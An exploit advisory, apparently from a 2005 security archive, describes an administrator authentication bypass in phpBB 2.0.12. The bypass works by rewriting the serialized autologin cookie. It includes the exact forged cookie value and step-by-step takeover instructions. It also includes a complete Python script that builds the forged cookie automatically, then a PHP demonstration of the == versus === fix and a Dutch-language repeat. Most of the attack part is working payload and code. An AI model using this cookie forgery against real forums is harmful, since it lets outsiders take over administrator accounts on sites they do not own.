
phpBB2012session.txt

Posted Mar 12, 2005
Authored by PPC

phpBB 2.0.12 session handling exploit that allows for administrative compromise.

tags | exploit
SHA-256 | 8142b72c22b6629166d0585d515d339b725b68c6888afca57777e9af981784dd



-----------------------------------

phpBB 2.0.12 Session Handling
Administrator Authentication
Bypass EXPLOIT -SIMPLIFIED-
- By PPC^Rebyte

-----------------------------------

03 March 2005

** DUTCH VERSION BELOW **

[ ENGLISH VERSION ]

*** Status
__________

phpBB has already been informed about this bug and released a
'critical update' (2.0.13) on 27 February 2005; however, most forums are
still running version 2.0.12 or lower.

VULNERABLE:
- 2.0.x up to and including 2.0.12

IMMUNE:
- 2.0.13 or newer


1* Intro
________

The discoverer of this bug is unknown, according to "Paisterist", who wrote
a C exploit for it.

Link to Paisterist's exploit at Packetstormsecurity:
http://packetstormsecurity.org/0503-exploits/phpbbsession.c

This program didn't work as it should on my PC, so I had to find a way to
exploit the bug manually myself.
This turned out to be much easier than compiling that C exploit and fooling
around with it until it eventually still doesn't work (in my case).
The simplified manual method I describe here can also be used with Internet
Explorer or other browsers, not only Mozilla/Firefox.


2* The bug
__________

We're going to edit a cookie so that the next time you visit a given forum
you are logged in with admin rights. This is possible because of a bug in
includes/sessions.php, where the autologin key taken from the cookie is
checked with a loose comparison:
--> if( $sessiondata['autologinid'] == $auto_login_key )

The cookie holds a PHP-serialized array that the server hands straight to
unserialize(), so the client controls the type of every value in it. If
autologinid is set to the serialized boolean true (b:1), PHP's == converts
$auto_login_key to a boolean as well, and any non-empty key then compares
equal. The check passes without knowing the key, and the userid field
decides whose session you get.


3* Preparation
______________

1. Register at the forum (if you do not already have an account).

2. Log in with that account
+ UNCHECK "Log in automatically"

3. Close the browser so the cookie is written to the cookie file on disk.

4. Locate the cookie
*firefox: X:\Documents and Settings\Name\Application Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
--> search the .txt for the domain name (domain.tld)
*iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
--> default cookie name = phpbb2mysql; the serialized session data is in the
cookie whose name ends in _data (so phpbb2mysql_data by default)

4* Let's Xploit!
________________

Open the cookie in a text editor and search for the value that resembles the
following (a URL-encoded, PHP-serialized array):

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

decoded: a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"X";}

where X is your own 'user id' (if it has more than one digit, the length
field in front of it, s:1:, is larger accordingly).

Replace this with:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

decoded: a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

where 2 is the 'user id' of the admin (the first account created when the
board was installed; another account's id can be read from the u= parameter
of its profile link) and b:1 is the serialized PHP boolean true, which the
loose == comparison accepts as equal to any non-empty key.

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save the cookie file and close it.
Open your browser and surf to the forum.

You'll now be automatically logged in with admin rights :)
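To build the forged cookie without hand-editing the percent-encoded string, here is an added example (my code, not part of the original text or of phpBB): a minimal parser and serializer for the subset of PHP's serialize() format the cookie uses (strings, integers, booleans, arrays). It decodes the existing _data cookie value, sets autologinid to the boolean true and userid to the target id, and re-encodes it. Because it recomputes the string length prefixes it also handles user ids of more than one digit, which the fixed string above does not. The sample cookie value under __main__ is constructed (a user with id 7); the function names are my own.

```python
"""Forge the phpBB 2.0.12 autologin cookie described above (added example)."""
from urllib.parse import quote, unquote


def php_unserialize(data: str):
    """Parse a PHP serialize() string covering the b:, i:, s: and a: types only."""
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def _parse(s: str, i: int):
    """Return (value, index_after_value) for the value starting at s[i]."""
    t = s[i]
    if t == "b":                                   # b:1;  /  b:0;
        end = s.index(";", i)
        return s[i + 2:end] == "1", end + 1
    if t == "i":                                   # i:42;
        end = s.index(";", i)
        return int(s[i + 2:end]), end + 1
    if t == "s":                                   # s:6:"userid";
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2                          # skip :"
        return s[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:2:{key;value;...}
        colon = s.index(":", i + 2)
        count = int(s[i + 2:colon])
        j = colon + 2                              # skip :{
        result = {}
        for _ in range(count):
            key, j = _parse(s, j)
            val, j = _parse(s, j)
            result[key] = val
        return result, j + 1                       # skip }
    raise ValueError(f"unsupported PHP type {t!r} at offset {i}")


def php_serialize(value) -> str:
    """Inverse of php_unserialize for the same four types (bool is tested before int)."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"cannot serialize {type(value).__name__}")


def forge_autologin_cookie(cookie_value: str, admin_user_id: int = 2) -> str:
    """Rewrite the URL-encoded *_data cookie so autologinid is the PHP boolean true."""
    data = php_unserialize(unquote(cookie_value))
    data["autologinid"] = True                     # serializes as b:1
    data["userid"] = str(admin_user_id)            # phpBB stores the id as a string
    return quote(php_serialize(data), safe="")     # re-encode every delimiter


if __name__ == "__main__":
    # Constructed sample: cookie of user id 7 who left "Log in automatically" unticked.
    original = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B"
                "s%3A6%3A%22userid%22%3Bs%3A1%3A%227%22%3B%7D")
    print("decoded :", php_unserialize(unquote(original)))
    print("forged  :", forge_autologin_cookie(original))
```

Paste the returned string in place of the old cookie value; the surrounding cookie name, domain and expiry fields are left untouched.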


5* Solution
___________

* Update phpBB to version 2.0.13 or newer

- or -

* in "includes/sessions.php" replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
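The bug from section 2 and the one-character fix above, as an added example (my code, not phpBB's own includes/sessions.php): a function that applies either comparison to a decoded _data cookie, run against an honest cookie and the forged one from section 4. The key value and the user id 7 in the honest cookie are placeholders; what phpBB actually uses as $auto_login_key is not shown here.

```php
<?php
// Added example, not phpBB's own code: the autologin check in its 2.0.12
// form (==) and its hardened form (===), applied to two cookie values.
// $auto_login_key stands in for the secret the forum compares against;
// the value used below is a placeholder.

function autologin_accepted(string $cookie_data, string $auto_login_key, bool $strict): bool
{
    // phpBB unserializes the *_data cookie straight from the request. PHP
    // already URL-decodes cookie values into $_COOKIE, hence urldecode() here.
    $sessiondata = @unserialize(urldecode($cookie_data), ['allowed_classes' => false]);
    if (!is_array($sessiondata) || !array_key_exists('autologinid', $sessiondata)) {
        return false;
    }
    if ($strict) {
        // Hardened check: a boolean is never identical to a string, so b:1 fails.
        return $sessiondata['autologinid'] === $auto_login_key;
    }
    // 2.0.12 check: with a boolean on the left, PHP casts the key to bool,
    // and every non-empty string casts to true.
    return $sessiondata['autologinid'] == $auto_login_key;
}

$key = 'f1e2d3c4b5a6';  // placeholder for the real per-user autologin key

// Cookie of an ordinary user (id 7 here) who left "Log in automatically" unticked.
$honest = 'a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%227%22%3B%7D';
// The forged cookie from section 4: autologinid = b:1, userid = "2".
$forged = 'a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D';

foreach ([['honest', $honest], ['forged', $forged]] as [$label, $cookie]) {
    printf("%-6s  == : %s   === : %s\n",
        $label,
        autologin_accepted($cookie, $key, false) ? 'accepted' : 'rejected',
        autologin_accepted($cookie, $key, true) ? 'accepted' : 'rejected');
}
```

Under == the forged cookie is accepted because PHP compares a boolean against a string by casting the string to bool, and any non-empty string is true; under === the operand types differ and it is rejected. One caveat the === patch alone does not cover: if the stored key for an account is the empty string, an honest cookie carrying s:0:"" is identical to it under both operators, so a hardened check must also refuse empty keys outright.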


6* Outro
________

THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

-- PPC^Rebyte --
-- ppc@respected.as --


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


[ DUTCH VERSION, translated to English ]

*** Status
__________

phpBB has been informed about this exploit and released a 'critical update'
on 27 February, but most forums are still running version 2.0.12 or lower.

VULNERABLE:
- 2.0.x up to and including 2.0.12

IMMUNE:
- 2.0.13 or newer


1* Intro
________

The discoverer of the bug is unknown, reports "Paisterist", who wrote a C
exploit for this bug.

Link to Paisterist's exploit on Packetstormsecurity:
http://packetstormsecurity.org/0503-exploits/phpbbsession.c

This program didn't work at all on my PC, so I looked for a way myself,
using the exploit as a guide, to exploit the bug manually.
This actually went much faster than having to compile the C exploit and
fiddle around with it while in the end it still doesn't work properly
(in my case).
The simplified manual method I describe can also be used with Internet
Explorer or other browsers instead of only Firefox.


2* How it works
__________

We're going to modify a cookie so that when you visit a certain forum again
you are logged in with admin rights, due to a bug in sessions.php
--> if( $sessiondata['autologinid'] == $auto_login_key )

3* Preparation
________________

1. Register at the forum if necessary

2. Log in with the account
+ UNCHECK "Log in automatically"

3. Close the browser so that the cookie is definitely written to disk

4. Locate the cookie
*firefox: X:\Documents and Settings\Name\Application Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
--> search the .txt for the domain name (domain.tld)
*iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
--> default cookie name = phpbb2mysql; the serialized session data is in the
cookie whose name ends in _data (so phpbb2mysql_data by default)

4* Let's Xploit!
________________

Open the cookie in a text editor and look for a value that resembles:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

where X is your own 'user id'.

Replace this with:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

where 2 is the 'user id' of the admin.

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save the cookie and close it.
Open the browser and surf to the forum.

Normally you will now be logged in with admin rights :)


5* Solution
____________

* Update phpBB to 2.0.13

- or -

* in includes/sessions.php replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


6* Outro
________

THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

-- PPC^Rebyte --
-- ppc@respected.as --